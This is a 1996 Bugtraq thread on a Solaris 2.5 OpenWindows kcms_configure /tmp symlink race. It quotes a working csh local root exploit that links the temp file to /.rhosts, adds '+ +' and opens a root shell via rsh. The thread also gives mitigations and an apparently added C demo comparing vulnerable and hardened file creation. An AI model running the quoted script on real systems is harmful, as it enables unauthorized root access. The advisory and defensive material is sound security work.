
Re: Zolaris 2.5 Exploited.

daemon@ATHENA.MIT.EDU (Jungseok Roh)
Thu Jul 25 20:34:50 1996

Date: 	Fri, 26 Jul 1996 08:48:17 -0900
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Jungseok Roh <beren@cosmos.kaist.ac.kr>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  <9607252300.AA22478@sol.acs.uwosh.edu> from "Brian T. Wightman"
              at Jul 25, 96 06:00:08 pm

> I tried this posted exploit as well, and it does work (quite well, in
> fact).
>
> I have looked at this a little closer, and it appears that you can
> protect yourself from this hole by doing one of the following (these
> are just the quick patches, not involving changing the UID of root,
> installing a safer rshd, etc)
>
> 1) root# chmod gu-s /usr/openwin/bin/kcms_c*
>
> or
>
> 2) root# touch /.rhosts
>    root# chown root:root /.rhosts
>    root# chmod 600 /.rhosts

     ln -s /dev/null /.rhosts is recommended.

   "Divided Alive, Interconnected Dead."
   That's the proverb in Internet security. :)

>
> I am not going to say that this plugs the hole completely; I haven't
> had the time (and probably won't) or the experience to dig deeper into
> this.  I will leave the deeper evaluation and patch to the experts.
>
> Brian
>
> P.S. If the followup to BUGTRAQ is inappropriate, my apologies.
>
> Brian T. Wightman                         Academic Computing, UW Oshkosh
> wightman@uwosh.edu                                       800 Algoma Blvd
> Phone: (414) 424-3020                                   Dempsey Hall 307
> http://www.uwosh.edu/faculty_staff/wightman/    Oshkosh, Wisconsin 54901
>
>
> In message <199607261337.EAA05783@cosmos.kaist.ac.kr>,
>   Jungseok Roh wrote:
> > Wow.. I got a chance to use an UltraSPARC that runs Zolaris 2.5 several days ago
> >  ~
> > then one of my seniors told me that there might be a funny, also INCONCEIVABLE
> > bug in OpenWindows.. I trusted him...
> > and I traversed the file system under /usr/openwin ..
> > there were just four SUIDed files .. ( if the admin installed the openwin packages )
> > xlock , ff.core , kcms* .. Problem made less vague
> >
> > kcms_calibrate , kcms_configure are the objects we are approaching.
> > When examining the kcms family, I found a funny thing .
> > kcms_configure makes the temporary(?) file in /tmp whose permission bits
> > are 666 ( Wow, the sign of the Devil ),, definitely root owns it..
> > ITS NAME is Kp_kcms_sys.sem !...
> > Then all you guys know what the next procedure is .
> > hk.. I can't show you the whole procedure right now.
> > 'Cause my Zolaris machine is "Network Unreachable ...".
> > One odd thing is that exploitation succeeds when it interacts with kcms_calibrate!!
> >
> > The major procedure is making the temporary file which is linked to /.rhosts, then
> > while kcms_configure tries to write /.rhosts, make thunder roll using
> > kcms_calibrate and make its power powerful.. puha.. it's like seeing
> > Back To the Future III... then kcms_configure succeeds in its operation .
> > I made a simple script exploiting the machine which has that fatal bug.
> >
> > hmm..but I can't erase one curiosity ..
> > Why did Sun make this humble mistake ?  ...  plz somebody notify Sun of this bug.
> > I don't know her e-mail address .. :)
> >
> > (what a simple one!!) The script follows .
> > This script just shows you the PROCEDURE .. re-make it to your demands .
> >
> > cat > uhit.sh << 'E_O_F'
> > #!/bin/csh
> > # JungSeok. Roh  ( beren@cosmos.kaist.ac.kr )
> > # Junior in KAIST undergraduate. Under Management Dep .
> >
> > # kcms_calibrate and kcms_configure are X clients; point them at a display
> > set disp="cosmos.kaist.ac.kr:0.0"
> > setenv DISPLAY $disp
> > /bin/rm -rf /tmp/Kp_kcms_sys.sem
> > cd /tmp
> >
> > # Making symbolic link: the fixed temp-file name now points at /.rhosts,
> > # so root's create/write of the "semaphore" lands in /.rhosts
> > ln -s /.rhosts Kp_kcms_sys.sem
> > /usr/openwin/bin/kcms_calibrate &
> >
> > while (1)
> >
> >   echo "Click the device you've chosen in the kcms_calibrate window"
> >
> >   # Choose any profile .. hk..
> >   # My 2.5 machine is unreachable so I can't get the exact name of that profile.
> >   # What a fool I am.. jjap..
> >   /usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/profiles/Eksony17.mon
> >
> >   # Once root has created /.rhosts (mode 666), append the wildcard entry
> >   # and rsh in as a UID 0 account that has a shell
> >   if ( -f /.rhosts ) then
> >     echo -n "+ +" >> /.rhosts
> >     # As you know, we can't log in as root .. use the smtp account, which has UID 0 !!
> >     /usr/bin/rsh localhost -l smtp csh -i
> >   endif
> > end
> > E_O_F
> >
> >
> > __
> >
> >  There was a legendary security task force team whose name was K/U/S ..
> >  But it was BLOWN up by the Korean National Prosecutor.. I hate them !!  .......
> >  They make me so sad ....  Laughin' in bitter tears ...  hk..hk..
> >
> >  JungSeok Roh / Junior in KAIST / beren@cosmos.kaist.ac.kr / +82-42-869-5400
>
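
The bug in this thread is the classic predictable-name /tmp race: a set-uid program open()s a fixed path with mode 0666 and no O_EXCL, and whoever plants a symlink under that name first decides which file root creates and writes. The C program below is an added example, not code from the thread or from Sun's kcms tools. It replays the pattern unprivileged in a private scratch directory, so attacker and "root" victim are the same user and what it demonstrates is the open(2) behaviour, not the privilege boundary. Only the file name Kp_kcms_sys.sem comes from the post; the scratch directory, the stand-in for /.rhosts and every function and struct name are my own. It runs the vulnerable open, the same open hardened with O_EXCL|O_NOFOLLOW and mode 0600, the thread's `ln -s /dev/null` mitigation, and a mkstemp() variant, and records what each did to the target.

```c
/* Added example, not code from the post or from Sun: the predictable-name
 * /tmp race described above, replayed unprivileged in a scratch directory.
 * Only the file name Kp_kcms_sys.sem comes from the post; the rest is mine. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

struct demo_result {
    int vulnerable_rc;         /* 0: "root" write went through the planted link */
    int target_created;        /* 1: stand-in /.rhosts now exists as a regular file */
    unsigned target_mode;      /* its permission bits: 0666 (umask 0) */
    int hardened_rc;           /* -1: hardened open refused */
    int hardened_errno;        /* EEXIST: the planted link already sits at the name */
    int target_after_hardened; /* 0: nothing created behind the link */
    int devnull_rc;            /* 0: bad open "succeeds" when target -> /dev/null ... */
    int devnull_still_link;    /* 1: ... but no real file appears there */
    int random_rc;             /* 0: mkstemp() variant worked */
};

/* The pattern the post describes: fixed name, mode 0666, no O_EXCL. open(2)
 * follows a symlink planted under that name, so the create+write lands
 * wherever the attacker pointed it. */
int create_sem_vulnerable(const char *path, const char *content) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    if (fd < 0) return -1;
    ssize_t n = write(fd, content, strlen(content));
    close(fd);
    return n == (ssize_t)strlen(content) ? 0 : -1;
}

/* Same name, hardened: O_EXCL fails with EEXIST if anything (a symlink
 * included) already exists at the path, O_NOFOLLOW refuses a symlink as the
 * final component, and 0600 keeps other users from appending. */
int create_sem_hardened(const char *path, const char *content) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, content, strlen(content));
    close(fd);
    return n == (ssize_t)strlen(content) ? 0 : -1;
}

/* Better: no predictable name. mkstemp() creates with O_CREAT|O_EXCL, 0600. */
int create_sem_random(const char *dir, char *path_out, size_t len) {
    if (snprintf(path_out, len, "%s/Kp_kcms_sys.XXXXXX", dir) >= (int)len) return -1;
    int fd = mkstemp(path_out);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

/* Plays attacker and victim in one private directory; 0 on success. */
int run_demo(struct demo_result *r) {
    char dir[] = "/tmp/kcms_demo.XXXXXX", target[256], link[256], rnd[256];
    struct stat st;
    mode_t old_umask = umask(0);             /* make the 0666 visible */
    memset(r, 0, sizeof *r);
    if (mkdtemp(dir) == NULL) { umask(old_umask); return -1; }
    snprintf(target, sizeof target, "%s/rhosts", dir);        /* stand-in for /.rhosts, absent */
    snprintf(link, sizeof link, "%s/Kp_kcms_sys.sem", dir);   /* the fixed name from the post */
    if (symlink(target, link) != 0) { rmdir(dir); umask(old_umask); return -1; }

    /* 1. Vulnerable: open() follows the dangling link and creates the target 0666. */
    r->vulnerable_rc = create_sem_vulnerable(link, "1\n");
    if (lstat(target, &st) == 0 && S_ISREG(st.st_mode)) {
        r->target_created = 1;
        r->target_mode = st.st_mode & 0777;
    }
    unlink(target);                          /* reset: the link dangles again */

    /* 2. Hardened: same planted link, open refused, nothing created. */
    r->hardened_rc = create_sem_hardened(link, "1\n");
    r->hardened_errno = errno;
    r->target_after_hardened = (lstat(target, &st) == 0);

    /* 3. The thread's "ln -s /dev/null /.rhosts": the bad open still follows
     *    link -> target -> /dev/null, but the write is swallowed. */
    if (symlink("/dev/null", target) == 0) {
        r->devnull_rc = create_sem_vulnerable(link, "1\n");
        r->devnull_still_link = (lstat(target, &st) == 0 && S_ISLNK(st.st_mode));
        unlink(target);
    }

    /* 4. Random name: unaffected by whatever the attacker planted. */
    r->random_rc = create_sem_random(dir, rnd, sizeof rnd);
    if (r->random_rc == 0) unlink(rnd);
    unlink(link); rmdir(dir); umask(old_umask);
    return 0;
}

int main(void) {
    struct demo_result r;
    if (run_demo(&r) != 0) { perror("run_demo"); return 1; }
    printf("vulnerable: rc=%d created=%d mode=%04o\n", r.vulnerable_rc, r.target_created, r.target_mode);
    printf("hardened:   rc=%d errno=%s created=%d\n", r.hardened_rc, strerror(r.hardened_errno), r.target_after_hardened);
    printf("/dev/null:  rc=%d still symlink=%d   mkstemp: rc=%d\n", r.devnull_rc, r.devnull_still_link, r.random_rc);
    return 0;
}
```

Build with `cc -o kcms_demo kcms_demo.c` and run it as an ordinary user. With umask forced to 0 the vulnerable case reports the stand-in /.rhosts created with mode 0666, the hardened case reports EEXIST and no file, and the /dev/null case reports a successful write that created nothing. The chmod u-s and /.rhosts tricks from the thread only take away this one target; O_EXCL plus a non-predictable name is what removes the race itself.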
